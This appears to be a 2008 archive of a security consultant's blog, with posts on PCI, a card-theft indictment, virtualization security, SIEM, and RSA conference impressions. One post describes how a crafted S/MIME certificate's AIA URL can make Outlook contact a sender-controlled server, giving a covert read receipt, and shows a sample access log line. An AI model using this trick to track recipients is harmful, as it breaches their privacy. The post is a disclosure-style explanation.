The indictment of 11 people on a mass card theft is all over the news this week. I've seen reports about software developed to steal cards, war driving and other stuff that I really don't know if it's just bad press or actual facts. There are some good info here and here.Of course PCI will be brought into the middle of the discussion about the methods used by the group. It seems that the attacks happened a long time ago (2003), but it's interesting to look into the story with the eyes of the standard. Like, why was so easy to these guys to go into the card data environment (CDE)? PCI has very specific rules about wireless networks, what I'm almost sure that those companies were not following. Besides that, it seems that all that information was being transmitted without proper encryption.An interesting aspect of the attacks is that they used tools developed specifically to steal card data. In the same way that there are tools being designed to identify sensitive data in order to protect it (DLP tools, e-discovery stuff), tools designed to steal that data will also be developed. I was reading on Hay's blog today about the Coreflood Trojan. Criminals developed a trojan and deployed that in a clever way to avoid being detected. They used a strategy that we have been using on "penetration tests" for years, to leverage access to a workstation and wait for an domain administrator to log in there to steal his passwords (and the keys to the kingdom). The results? According to Joe Stewart from SecureWorks, ". "So, we can see that criminals have leveraged the ability to go into large corporate networks with high privileged access rights. They also know what information they need to get, and the technology to look for that is improving everyday. It's not hard to play the oracle and say that in a near future we will witness some huge scams performed by very organized criminal groups. Welcome to the future.

Thursday, July 31, 2008

PCI QSA

Just a quick note to say I've just heard that I'm now PCI QSA certified. Nice :-)(the test is really easy, actually...open book :-O)

Tuesday, July 29, 2008

Black Hat, Defcon, the basics

So we are finally approaching the BH/Defcon weeks, when all the new stuff is presented to the security world and the sky starts to fall once more. I'm not going to Vegas this year (I'd love to), but as I came back to work on vulnerability assessments and penetration testing I noticed the main issue is still linked to the basics.There are so many low hanging fruits that someone that is completely unaware of vulnerabilities and attack techniques from the past 5 years will still be able to do a lot of bad stuff on a 'vanilla' corporate network.Ask yourself these 5 questions. If you can't say yes to all of them, don't sign the check for that new-miracle-black-box you are buying and do your homework to fix the basics:

  • Can you promptly identify someone guessing passwords for administrative accounts on all your servers?

  • Can you say for sure that there are no weak passwords for all administrative accounts on all your servers?

  • Can you say for sure that you don't have a user/password on a test box that also exists on a production server?

  • Can you say for sure that there are no shared folders on your servers with sensitive information and weak permissions settings?

  • Do you know who knows the password for (and use) the root or Administrator account?
Maybe after that you can start thinking about some cool stuff from Black Hat :-)

Friday, July 18, 2008

PVLANs and DMZs

The PVLAN concept allows you to design a VLAN where the peers can communicate only with one (or more) specific peer, instead of full "n to n' connectivity.Now, why I'm not seeing people using that to deploy more secure DMZs (or simply zones)? I mean, if you'll place a web server, a SMTP server and a DNS server on your DMZ, why should they be able to talk to each other (assuming they don't have an specific need to do that)? If you do that, even with you web server compromised you still have the access restrictions from your firewall in place to protect the others, avoiding the old problem of stepping stones.Is there anybody out there that is doing that?

"Hanging on the wall" posting of the week

I really promised to myself that I would avoid "look at this post from X" posts here. But today is Friday and I've just read something that was so perfectly written and fun that I will break that promise:Read this, from Gunnar Peterson!

Thursday, July 17, 2008

CISSP value

Congrats for Andrew Hay on getting his CISSP. He does a great job when describing the value of this certification:"Due to the scope of the exam I forced myself to learn aspects of security that I had neither the reason, nor the desire, to understand. I feel that I have grown as a security professional because of my studies and hope that I can help others with the things that I have learned."That's exactly what I think about it. It won't ensure that the certified person knows everything, but he(she) should have passed through a lot of different security subjects while studying for it. Personally it was an eye opener, I understood that Security is far wider than what I originally thought when I had to study to take the test.

Thursday, July 10, 2008

VMWare vulnerability

Today I read about this VMWare vulnerability on Beaker's blog. It is related to the possibility of a non-admin user on the host OS to execute code on the guest OS. I read the details of the vulnerability and I understand why VMWare is saying that the described behavior is by design, and can also see why this could be a security issue. However, issues like this just confirm my point of view that it's not feasible to try to protect the Guest OS from the Host. It's a matter of layers, the guest OS is just a simple application on the host OS. We will see that the challenges on doing that are quite similar to those from the AV industry.IMHO, there are just a way to (partially) address those concerns. A single purpose Host OS, that will run only Guest OSes and no other software. Then a Guest OS under that can run the VM environment management tools, communicating with the other Guest Oses through regular (although virtualized) networking. A regular client server application with all the proper AAA and encryption controls can be used over that network (why not IPSEC communication?). Even exclusive virtual network adapters can be used on the Guest OSes to host the traffic of the management application. The client would be installed like a regular application on the Guest OSes (like VMWare Tools) and be subject to all the OS controls.That won't help against malicious code running on the Host OS, but will reduce the possibility of that code being executed there, just by reducing the roles of the Host.

Wednesday, July 9, 2008

Master dissertation test

I'm trying to finish my Master dissertation on the next months. In order to do that I need to test the log analysis methodology I'm proposing. The methodology is targeted to detect insider attacks, so I need to collect logs from internal resources, which include AD domain controllers, internal e-mail systems, file and folder access audit logs, firewalls and other network devices, http servers, applications, and everything else that can produce logs and indicate internal users behavior. I would need to collect one week of logs for the tunning phase and after that one week of logs that will include some "simulated attacks". If there is anybody out there that can help me by providing those logs (everything will be anonymized, of course), please drop me an e-mail at augusto (at) securitybalance.com.Thanks!

Kaminsky and the new vulnerability patching world

A few years ago, it would be impossible to imagine something like what Dan Kaminsky has done with the recently uncovered DNS cache poisoning vulnerability. Although the technical details of the issue are still not public (and are probably "wicked cool", 3117, etc), the mosr impressive fact of the whole story is that there was an joint effort from several companies (competitors included) and organizations to release the patch in a organized way. It is the best sample of responsible disclosure I've ever seen so far. I think this is a vey good example of how mature our field is comparing to old times.Congratulations (one more time) to Kaminsky. And to the participants of the joint effort too.  

Thursday, July 3, 2008

Virtualization security, some thoughts about it

I was reading the post from Hoff where he writes about virtualization and the DMZ, based on a white paper from VMware. I've been reading Hoff's posts (and others with whom he discusses the subject) about virtualization and I thought it would be interesting to also right a little about it.There is a lot of research results being published regarding VM security. Some of those try to demonstrate security issues, like malicious hypervisors, systems trying to escape its VM and trying to reach other VMs or even the hypervisor, some are proposing ways to avoid and detect those threats, and so on. I firmly believe that we can reach a very high level of security to protect the hypervisor and its role from threats coming from the VMs. That's because of the difference of "security layers". There are lots of cases of success of code running in a higher privilege layer controlling code running under it, like VMS, Java VM and others. People are working with VM technology on the mainframes for years and it they were (the problem with the mainframe world is it lacks its own ShmooCon, DefCon, BlackHat, etc) able to reach a decent level of security on that.There are some features that are being virtualized that will demand us a little more care to ensure a good security level, like the network devices roles. I also believe that it's not that far either. We were able to produce fairly decent code to run on switches and routers, if we bring the same code to the VM world (would Cisco be bold enough to offer something like "VMIOS", to run several instances of its boxes on a single big box?) we can do that there too.The big issue that I think it will remain is the VM and Hypervisor environment security, I mean, the environment where that highest level VM software is running. Based on my understanding (and I think it's almost common sense), whoever controls the hypervisor rules the VM world. The VM servers are being assembled like a common server, but the VM software should be quite more protected than a common application. Can you imagine running your "Virtual DMZ" over a Windows 2000 server, knowing all the other software that is also running on that and can't be disabled or uninstalled? The attack surface of the server running the VMs needs to be VERY small. On mainframes the top layer (where the LPARs are running over) can usually be accessed only from a local console. No network access, terminal. Nothing. I know that on the distributed computing world this can't be a huge headache to manage, but we don't need to go that far. I believe that the Server Core option for Windows 2008 is a good example of where to place a VM environment over, or something like a YALD (Yet Another Linux Distribution) specially prepared from scratch to be a VM server. The kernel, the VM software and nothing else. Maybe SSH for (console) remote management, but that's all. Can anyone find a reason to have Gnome or KDE running on a VM Server? I can't.Maybe I'm being a little naive when analyzing the VM problem this way. But I'm looking at the "VM" experiences from the past and I can't see challenges that go beyond that. If you start thinking about very different communication between VMs besides common vanilla networking (like sharing memory areas), maybe it's time to think why you are trying to do that instead of placing the apps from those VMs under the same OS. And for securing basic vanilla networking on VMs, we are almost getting there.

Monday, June 30, 2008

Unauthorized reading confirmation on Outlook

Last month, during the a exam item writing workshop for the CISSP-ISSAP certification, I got an idea about how a malicious e-mail sender could try to get a unseen by the recipient reading confirmation, including the IP address of the recipient. I was talking about S/MIME messages and I thought about the signature validation process, where some of the steps could require external information (like a CRL) to be accessed. The interesting part of it is that the location of this information can be included in the message itself, as the PKCS#7 package can also include the certificate used to generate the signature.I went into Microsoft documentation about the validation process from Outlook, and found this:(reference: http://technet.microsoft.com/en-us/library/bb457027.aspx#EKAA)When the first certificate in the chain is validated, the following process takes place. 1.     The chaining engine will attempt to find the certificate of the CA that issued the certificate being examined. The chaining engine will inspect the local system certificate stores to find the parent CA certificate. The local system stores include the CA store, the Root store, and the Enterprise Trust store. If the parent CA certificate is not found in the local system certificate stores, the parent CA certificate is downloaded from one of the URLs available in the inspected certificates AIA extensions. The paths are built without signature validation at this time because the parent CA certificate is required to verify the signature on a certificate issued by the parent CA.2.     For all chains that end in a trusted root, all certificates in the chain are validated. This involves the following steps.*           Verify that each certificate's signature is valid.*           Verify that the current date and time fall within each certificate's validity period.*           Verify that each certificate is not corrupt or malformed.3.     Each certificate in the certificate chain is checked for revocation status. The local cache is checked to see if a time valid version of the issuing CA's base CRL is available in the cache. If the base CRL is not available in the local cache, or the version in the local cache has expired, the base CRL is downloaded from the URLs available in the CDP extension of the evaluated certificate. If available, it is confirmed that the certificate's serial number is not included in the CA's base CRL.As described, the recipient system will try to gather the CA certificate from a URL that is specified on the signers' certificate, that is embedded in the signed message. A specially crafted certificate can be generated with an AIA (Authority Information Access) containing an URL controlled by the malicious sender. By doing that the sender will immediately know when the message recipient read the message on Outloook, even if the certificate is untrusted (so you won't need a certificate from a Trusted CA to be able to do that). I performed  some tests that confirmed this scenario. Other e-mail clients like Mozilla Thunderbird and Lotus Notes have not presented the same behavior. It seems that only Outlook implements this part of RFC2459. It's behaving in the right way, but I believe that the user should have the ability to disable it.

Here is a sample of a web access from the recipient of a message crafted like that. On this case, the AIA address included in the certificate was poitining to the  "http://www.securitybalance.com/ca.html" URI.

10.10.10.31 - - [12/May/2008:15:47:43 -0400] "GET /ca.html HTTP/1.1" 200 116 "-" "Microsoft-CryptoAPI/5.131.2600.3311"
(anonymized IP address)

Wednesday, June 25, 2008

SIEM dead, time for search?

This is what Raffy is saying:"Some of the problems I see with Security Information Management are (the first four are adapted from the Gartner IDS press release):

  • False positives in correlation rules

  • Burden on the IS organization by requiring full-time monitoring

  • A taxing incident-response process

  • An inability to monitor events at rates greater than 10.000 events per second

  • High cost of maintaining and build new adapters

  • Complexity of modeling environment
However, the biggest problem lies in the fixed event schema. SIMs were built for network-based attacks. They are good at dealing with firewall, IDS, and maybe vulnerability data. Their database schema is built for that. So are the correlation rules. Moving outside of that realm into application layer data and other types of logs can get hard. Fields don’t match up anymore and the pre-built correlation rules don’t fit either.We need a new approach. We need an approach that can deal with all kinds of data. An approach that deals with multi-line messages, with any type of fields, even with entire files as entities. There is a need for a system that can collect data at rates of 100.000 events a second and still perform data analysis. It needs to support large quantities of analytical rules, not just a limited set. The system needs to be easy to use and absorb knowledge from the users.The solution is called IT search."I really agree on the value of IT search, but I believe we have some confusion over the main objectives of each tool. If you are thinking about data mining and a more deep analysis of log data, maybe searching is really a better approach. What I really question is using searching for alerting purposes. I don't think search based architectures for a "log analysis IDS" scale.Raffy hits the point when he mentions that SIEMs target network based devices. I have seen people working to integrate logs from different sources (applications) on those tools having a hard time with the vendors, who simply can't understand the notion of using other log data besides routers, firewalls and IDSes.Of course that logs from applications are not as simple as logs from network devices. Maybe that's why the vendors are avoiding them. They want to sell their products as plug and play boxes, and you can't have a plug and play installation when dealing with custom applications. What I believe is that a effective SIEM (or, if you don't want to define the technology behind it, a consolidated log monitoring) solution installation is more similar to a ERP (or Identity Management) deployment than to an antivirus deployment. If vendors could improve their products not by including more supported log formats but by delivering a fast an easy way to build log parsers, together with a flexible model for the entities that the tool and its rules can work with it would be quite easier to deploy them to provide better value and integrating more log sources.The IAM tools evolved the same way. Since the beginning they could work with LDAP, ActiveDirectory, RACF and other famous identity repositories. The challenge for the adopters, however, was not on integrating these tools but those old legacy applications. The IAMs that have better "universal adapters" are those that can generate the best results. I think it would be the same for SIEMs. All of them can work with CEE or something similar, but those with easy (and intelligent) tools to accept different sources will bring more benefit to the customers. Even search technology can be used in order to do that.So, don't blame SIEM tools, but their architects. When these people can understand where the biggest value for those tools is we will start to see huge benefits from them.

Wednesday, June 18, 2008

Open Group Risk Management "taxonomy"

I was reading this:

"With a goal of getting IT professionals to use standard terminology and eliminate ambiguity in expressing important risk-management concepts, the Open Group is finalizing a 50-page compendium of "risk-management and analysis taxonomy."

The Open Group Security Forum's risk taxonomy of about 100 expressions will not only address seemingly simple words such as threat, vulnerability and risk, but less common terms such as control strength."I was thinking, why these guys are doing it when there are stuff like ISO Guide 73, ISO27005 and ISO27000 published or in their way to be published?

This is why we asked so much for Server Core

This study from Jeff Jones blog show why the Server Core feature of Windows Server 2008 was so expected by security professionals. We can see a 40% reduction on the vulnerability numbers for a server running Windows if it was using something like Server Core. My main concern now is if software providers will enable their products to run over a Server Core server. It would be a shame to have this feature and can't use it because some piece of software demands Solitaire to be installed in order to run :-)

Friday, June 13, 2008

I'm back

I'm back. OK, almost. Today I spent two hours reading lots of accumulated RSS news, blog postings and others. I was glad to see that nothing very exciting happened during the last weeks, when I was moving to Toronto and wasn't able to follow the news and post on the blog. Now my life is slowly getting into something we may call "routine", so I think it's time to resume the activities of this blog.First, it seems that there are some good stuff from Mogull and Schneier. I'll read their posts as soon as possible to see if there is something I can add about.Today I went to Infosecurity Toronto. I was impressed on how small the exhibition was. Someone told me that the owners of the event did something weird on the marketing side, starting the negotiation of space and sponsorships too late. However, it was good to go there and take a quick look into the local security market. As always, conferences are those places where there are lots of vendors and not a single customer :-)I'm still looking for a job here. I'm having some good conversations with some pretty interesting companies, I hope to be employed by the end of this month.One interesting thing to mention here is that during my last week in Brazil I was hacked. Yes. I'm not ashamed to say that, specially because I'm aware that security professionals draw more attention from potential attackers. What happened was that I made two mistakes related to my personal password management "policy". I was using the same password to services supposed to be less low-risk to me. The first mistake was to consider 3 services that have higher risk implied as "low risk" (actually, I couldn't even remember I was using that pwd on them - it was something very automatic for me) and the second was to use that password on a very target and potentially insecure service. There is a small group of self-called "hackers" in Brazil that are trying to cause problems to the key names of Information Security of the country. Unfortunately, I am on that list. As I was caught in the middle of my relocation I was unable to follow a lot of incident response procedures I would like to, but I'm also aware that some of the others that are being targeted by this group are doing that. I won't even talk too much about it as it seems that what they are really looking for is that people talk about them. This, however, is interesting as a reminder for me that as a security professional I need to be a little more paranoid about security on my personal stuff.That's all for now. I hope to able to find more interesting stuff to write about again. I'm keeping my personal "in portuguese" blog updated with my impressions about my new city, but this one needs some special care too. I'll try harder.

Thursday, June 5, 2008

I didn't quit the blogging stuff

I know that there are ages since I wrote here last, but I'm finally putting together what I need here in Toronto and I believe that in a few days I'll resume not only my blogging but my twitter presence. Don't unsubscribe, dear readers!

Friday, May 16, 2008

The discussion about GRC

Good information will always come from discussions between people like Gunnar Peterson, Richard Mogull, Chris Hoff and Alan Shimel. This time's target are GRC tools. It started with Peterson, was commented by Hoff and Mogull, followed by Shimel.There is space for GRC tools on the market, but it is really risky to change a security product roadmap to rebrand it as GRC. Axur ISMS is a very nice tool to oversee and manage a security program, leading to compliance results. However, it will never work without all the processes and tools that lie beneath the strategic layer. How can a tool like that replace, let's say, an antivirus or even a firewall?The way that all those tools are being managed and how they are addressing risks is information and it needs to be properly managed. This is were GRC products can help. If you don't have tools and process to be managed, forget about GRC. Do the basics first.

Debian

Debian: transforming public key in shared key encryption.

Thursday, May 15, 2008

Vulnerability Numbers, Q1 2008

Jeff Jones has just published some pretty interesting vulnerability numbers from Q1 2008.Ok, I know that the source is Microsoft, but the numbers and their meanings are very well documented, im my opinion. I'm one of the believers that these numbers show the results of the impressive security initiative from Microsoft. It's also good to see the numbers about vulnerabilities in Apple software, what also shows the results of a security posture (a very crappy one, indeed).Linux numbers are not a surprise to me. The problem this week for Linux is the very very ugly vulnerability on the PRNG system. By reading how it came to appear into the code just shows that the same reason that open source defensors use to argue it is more secure can also make the software less secure. Interesting.

Saturday, May 10, 2008

(ISC)2 exams

This week I'm participating on a (ISC)2 Workshop for item writing and review for the ISSAP certification. This opportunity brought to me a very good view on how the exams are created and managed. Honestly, what I have seen until now completely changed the way that I see these certifications. The process is thorough and the questions pass through a review by several very good professionals. I know that passing a test, even one with good questions, is not a proof of professional competency, but it's a good way to assess the basic knowledge of a candidate. Congratulations to (ISC)2!

Wednesday, April 30, 2008

Virtualization - there is also a good security aspect

I was reading this article from NetworkWorld about "Virtual Server Sprawl" and the problems it causes to security. Well, while I agree with the point of view presented there, I also think the the ease to deploy a new server brought by virtualization can also help us to control an old security problem: servers with too many functions.Lots of people already said that VMs should be grouped by their sensitivity levels, and I agree with that. If organizations use virtualization to improve the segregation of duties of servers and keep the grouping concept, it will certainly help to improve network security. It was always sad to me to see those Web+DNS+SMTP servers. Now they can be kept on a single hardware, but with a higher isolation through virtualization.

Thursday, April 24, 2008

Finally someone said it!

I was extremely happy to read this post from Richard Mogull, where he says:"Data Classification Is DeadI know what’s running through your head right now.“WTF?!? Mogull’s totally lost it. Isn’t he that data/information-centric security dude?”Yes I am (the info-centric guy, not the insane bit), and here’s the thing:The concept that you can run around, analyze, and tag your data throughout the enterprise, then keep it current through changing business contexts and requirements, is totally ridiculous. Sure, we have tools today that can scan our environment and, based on policies, tag files, but that just applies a static classification in a dynamic environment. I have yet to talk with a customer that really does enterprise-wide data classification successfully except for a few, discrete bits of data (like credit card numbers). Truth is that’s data identification not data classification.Enterprise content is just too volatile for static tags to really represent it’s value."A few years ago I was advocating the same thing during a discussion with some friends, where I was complaining about how pointless the current data classification policies and procedures are when we think about the current state of applications, data sharing and web 2.0 stuff. I just don't believe that information classification can happen in a dynamic organization in the way that is taught in, let's say, a CISSP prep class. We really need to think out of the box when dealing with the challenges of priorizing security measures according to the value of information.I'll quote Richard again about data classification: "That, my friend, is not only dead, it was never really alive."

Wednesday, April 23, 2008

The new security guy

Alan Shimel has blogged about a very common situation, that where a networking (or anything else) guy becomes the new security guy.I've lost count of how many times I've seen that! The problem is, it's not only common but it's also impressive that several of these guys believe they know all about security from the moment they received the new job title.I worked in a big security team where almost everybody there were not security professionals, they just end up "falling" into the security department. It was a huge nightmare to make them understand that they didn't know the basic concepts and that some things have to change. Until people don't understand that our job isn't something like a new device that you learn how to set up we will keep seeing those cases and the results from them: breaches, breaches, breaches.

Friday, April 18, 2008

Isn't it an interesting case for business continuity studies?

I was reading about the strike of the federal custom auditors here in Brazil. They are not inspecting cargo coming through the ports, so the containers arriving can't be unloaded. Ok, it shouldn't be a problem for exporting goods, as the problem is with imported goods, right?Not necessarily. The strike is causing problems to exportations, as not only the storage areas at the ports are full but now there is also a problem of lack of empty containers! Isn't it a interesting case for business continuity studies?

Thursday, April 17, 2008

Windows Server 2008 - Server Core

I really love the concept of Windows Server Core - an installation that includes only the minimal components needed to make Windows work as a Server - that Microsoft will include in WIndows Server 2008. The advantage of it is obvious, reducing the attack surface.However, just now I found an interesting piece of data, someone looked into information from past security bulletins and noticed that from 25 past bulletins only 4 would apply for Server Core. Quite interesting, isn't it? So follow the tip from this post and go ask your software provider if his product will work on a Server Core installation.

Have you tried Secunia PSI?

In times when we are talking about flaws in Adobe Flash, Apple Quicktime and so many others, it's good to ask how are we doing to ensure that we are not running software with known vulnerabilities. Last August I blogged about Secunia PSI. I'm using it since them and it's impressive how hard is to be updated with all the software running on our workstations. The scanning process is a bit resource intensive, so I choose to run it periodically (once a week) instead of keep it always running.Today I ran PSI and it found some things that should be updated. Some of them were expected (Adobe Flash) and others I was not aware of, as VMWare Server, VLC  Player and  7-Zip.  This is a good example of how easy  is to have vulnerable software running in our computer. PSI does a vey good job on detecting software that needs to be updated, so I recommend it to everyone. If you are not using anything to keep track of software updates, try PSI. You will be surprised.

Adobe is the next target - does anyone still doubt?

A few days ago a new Adobe Flash vulnerability was found (in a very interesting work, I must say). I blogged about my concerns on ubiquitous software, like Flash players. We have been seeing the dangers of security vulnerabilities on this kind of software for years, beginning with Microsoft. Now that Microsoft is doing a good job on closing (and avoiding new) gaps, the attackers are taking the logical approach and changing targets to software that is as present as MS.Adobe (Acrobat, Flash, now AIR) and Apple (Quicktime and iTunes) would be the next  target, and it is being confirmed.  I heard on RSA that Adobe has a good security posture as a company (Dan Kaminski mentioned during his presentation that Adobe was acting very proactive and fast about a vulnerability he found) , but I still haven't found the same posture from Apple. Do we need to wait for a "iTunes worm" before Apple starts to take this matter seriously?

Polaris - A very interesting research piece from HP

Mr. Alan Karp mentioned this piece of research from HP Labs during a RSA session:"Polaris is a package for Windows XP that demonstrates that we can do better at dealing with viruses than has been done so far. Polaris allows users to configure most applications so that they launch with only the rights they need to do the job the user wants done. This simple step, enforcing the Principle of Least Authority (POLA), gives so much protection from viruses that there is no need to pop up security dialog boxes or ask users to accept digital certificates. Further, there is little danger in launching email attachments, using macros in documents, or allowing scripting while browsing the web. Polaris demonstrates that we can build systems that are more secure, more functional, and easier to use."The paper is quite simple and easy to understand, and but gives us some very important lessons. If Microsoft has tried a similar approach on Vista the UAC may have been more well accepted by users.This kind of research should be the core of Security Innovation.  Instead of trying to build "Anti-X", "Anti-Y" stuff, we should concentrate on reviewing things that are badly designed and that can be fixed in a elegant way, the same as Polaris does.

CyberStorm II and languages

The panel about the CyberStorm II exercise on RSA wasn't very good on content (in fact, it was terrible), but there was one thing that caught my attention.  There were other countries participating on the exercise, Australia, Canada, New Zealand and UK. Did you notice that only English speaking countries participated?Last year I saw Mr. Mike Reakey, from Microsoft, showing the kind of communication that their Response Center receive. That includes messages entirely written with different unicode char sets. Now, if this is a challenge for Microsoft Security Response Center, can you imagine the problem that the language barrier would be in a worldwide cyber crisis situation? I think the next CyberStorm exercise should include countries with different languages, to assess the impact that it can have on incident response and communication procedures. I'm certain that it will be bigger than expected.

Some good quotes from RSA

I took note of some interesting comments during RSA sessions. The most interesting are from the "Groudhog day". I was planning to write a post with comments and thoughts about each one, but I'm too tired and busy and RSA is already becoming too old news. So, I think a quick list of quotes will be enough:"Accept that behavior won't change" - Richard Mogull"Accept that vulnerabilities will exist" - Richard Mogull"Auditors don't understand security" - David Mortman(without quotes, I didn't take the exact words): You need to talk to the Business, but don't go there asking "how can I help you?"; Say something. - Mike Rothman

Tuesday, April 15, 2008

How many companies are looking into Security as a Marketing feature?

This question was made by Martin McKeay during a Panel on RSA (Avoding the "Security Groundhog Day", hosted by Mike Rothman). I took a note at that moment because the answer came to me immediately:Half of the companies are not doing that because their customers don't ask for itThe other half uses Security as a Marketing feature, but only as that, i.e., they sell that their products/services are secure but they are not. Consumers don't know how to verify their claims.A good example of that are those "Hacker Proof" signs hosted by some online stores. Everyone that have already performed some kind of security assessment on a e-commerce environment know that a vulnerability scan (all you need to have one of those seals) is not enough to say that a website is "hacker proof".The question is, how to educate consumers on identifying which companies really protect their data. Or, are consumers really worried about that?

From a RSA vendor leaflet

I'm looking at some leaflets that a got from some vendors at the RSA Expo. I've just caught this on one of them:"included signature-based anomaly detection capabilities"WTF is that!?!?! Can anyone explain to me what is "signature-based anomaly detection"?

RSA, final post

Writing this while waiting to board my return flight to Sao Paulo. It’s good to write after a few hours far from the conference, as it gives me a better view of what really impressed me most. I agree with other bloggers that mentioned the lack of innovation this year. However, it was expected.

I think I can mention some highlights. Black Ops, Sins of Our Fathers, Avoiding the “Security groundhog day”, the DLP Panel, Ajax Security were very good in terms of presentation and discussion, but honestly, nothing new from them.

The best sessions for me were Bruce Schneier’s and Malcolm Gladwell’s. Both talked about human perception and the way that we think. Schneier has already published some things about it, especially about the way thaty we perceive Risk. Gladwell presentation was very interesting even if it wasn’t related to security at all. He talked about decision making, but not common decisions, but those made unconsciously. I think there are lots of situations in security that can benefit from his theories. The way that we assemble and conduct security monitoring centers, for instance, can be radically changed. By reading his book (“Blink: The Power of Thinking Without Thinking

Media_httpwwwassocama_gggtj
”, I bought on the airport) I realized that we may be falling into some basic mistakes, like providing too much information for those that need to take decisions. It would be nice to do some kind of research with good SOC operators to see how they usually identify an attack, what information is used and see if can do the “thin slicing” approach that Gladwell explains in his book. If there was anything that provided food for though during the conference, I think it was that.

The exposition was kind of sad. Tons of “appliances” providing solutions to problems defined by the vendors themselves. Lots of vendors talking about how their products provide very nice reports, but what about detection, prevention? Can all the problems in security be solved by a nice report with some pie charts?

The networking aspect, by the other side, was terrific. I met lots of people who write very good blogs, people that I found that are reading mine. I hope to be able to attend to the conference the next years to maintain all those contacts. Thumbs up for Martin McKeay, Jennifer Leggio and Alan Shimmel for organizing the bloggers meetup. It was very good and an extraordinary opportunity to chat with people that I respect a lot. Thanks!

Thursday, April 10, 2008

RSA post number 2

This second day of RSA was quite interesting. Not exactly because of the presentations, almost everything that I saw today was very shallow and nothing new. I can mention a honorable exception, "Sins of Our Fathers", with Daniel Houser, Hugh Thompson and Benjamin Jun. Good speakers and good (although not new) content.The best part of the the day was definitely the bloggers meetup. I was very nice to talk to people I only knew from blogs, like Jennifer Jabbusch, Chris Hoff, Richard Mogull, Martin McKeay, Mike Rothman and even Bruce Schneier. I have the opportunity to talk to Bruce for a few moments about his RSA presentation, and was pleased to find that he agrees that the source of the Security Theater that we are seeing from new solutions is the fact that buyers are not providing their Model to vendors, they are asking the vendors for Models. Unfortunately, he had to left the meeting early. It would be nice to know what he thinks that should be made to help buyers providing their own Models to vendors instead of asking for one.There are some more interesting talk tomorrow. Let's see if some innovation will appear or if RSA 2008 will be remembered just as "a nice event without anything new".